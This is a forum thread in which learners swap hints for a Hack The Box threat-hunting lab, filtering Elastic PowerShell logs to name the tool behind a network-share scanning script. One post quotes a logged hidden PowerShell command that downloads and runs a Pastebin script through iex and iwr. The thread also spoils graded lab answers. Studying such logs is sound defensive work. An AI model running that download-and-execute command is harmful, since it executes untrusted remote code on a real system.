Stuxbot - INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC

Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___

Hi Guys,

Has anyone cracked this question? I was able to finish everything including the skill assessment but not this one. Any hints, clues, or steps are appreciated.

1 Like

Hey how did you find the Enter your answer for Hunt 2. on the skill assessment

Check this post!
https://forum.hackthebox.com/t/hunting-for-stuxbot-help/293247

Hey, I managed to solve this question. It was a bit tricky as it required something that was not mentioned in the module. You will want to pay close attention to logs that have a field powershell.file.script_block_text and look for anything network connected. Then just follow the hint ;))

3 Likes

Hello, I am having some trouble with the skill assessment,
how did you get this done?

Going crazy witth - . Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___ .

Followed hint and @Ignor idea with any ++ result. Any other idea ? Thanks

I solved this question. You have to find the events occurred from powershell and as @Ignor said filter logs

Hint :

1 Like

I eventually figured out the solution. It was purely by accident and a bit of guesswork. From the solution, my advice is to pay attention to the previous question about mimikatz.exe. Mimikatze was used in the process of hacking. This is the only link I found between the solution and what was thought through the lesson. Also, Note that the earlier hint to analyze powershell.file.script_block_text. Note the winlog.event_id or process.id for mimikatz, and read through the script block.

I am also looking for this, but currently I am stuck. Any luck with this?

Hello,i’ve been days on this one, can someone help me please?
i cant do it even with the info they said

Hi, I also have a lot of trouble with this question. I use the hint from ignor and also find some logs. but I can’t find the answer for the question. I need another hint. Is there anyone who can help me? cheers yoho

Start with what you know, the timeline and the initial compromised host. That gives you a good place to start with alerts. Then set a filter to only show those alerts that contain the aforementioned field: powershell.file.script_block_text. You can also make it easier for yourself by displaying a column of that field as well as another field that contains the order of the script blocks. Alternatively, grab a block and put it into a .ps1 file and upload it to something like VirusTotal. It should be able to identify it for you… good luck!

Hunt3 I found the answer but I can’t understand it. I didn’t use DC1 in the filter.Can someone explain to me exactly?

For those who are having difficulties, you can try :

this filter

powershell.file.

1 Like

hey, im working on hunt 3. any hints? i tried filtering using 4104, then down to host.hostname DC1, cant figure out what to do next. does this have anything to do with using zeek? ACTUALLY i got the answer but dont know how it is.

Hi All,

I managed it, but when I went on to the next chapter “Skill Assessment” I noticed that the explanation is there.
See PowerShell logs and the hint for Hunt3.

I don’t know maybe the questions were originally planed in a different order or HTB just simply liked to challange us.

Hopefully works for you as well,
Thanks

1 Like

I have checked every single event regarding powershell.exe and the only script I can find is the “-nop, -w, hidden, -noni, -noexit, iex (iwr https://pastebin.com/raw/33Z1jP6J -usebasicparsing)” but if I Google any of that, I get nowhere. What am I missing?

For those Finding it challenging at the moment, I just figured it our myself

  1. I read the Powershell Logs (Link) from the Skill Assessment (Just next Page) and found the EventCode4104 Useful which the Article Focused on
  2. I filtered event code with Host Name and set my date to cover March 26th from 22:05:00:00 to March 29, 22:00:00:00 which the attack spanned through
  3. I filtered for the powershell.file.script_block_text, it provided 193 Logs and I went through the Logs until I found the required Character P and V in the powershell.file.script_block_text field which showed up on the column. YOU WOULD FIND THE ANSWER!.
    Its actually a bit outside the current module but it was challenging, spent roughly 5 hours on this.
1 Like

Many thanks. I had to sift through around a 100 logs before I found it, but I got there in the end.

For easy navigation to the file and a smart way to get the file, filter the file.name field with the *exe * keyword and it’s going to generate way less file - just found out this approach recently. The power of Kibana Lies in the Query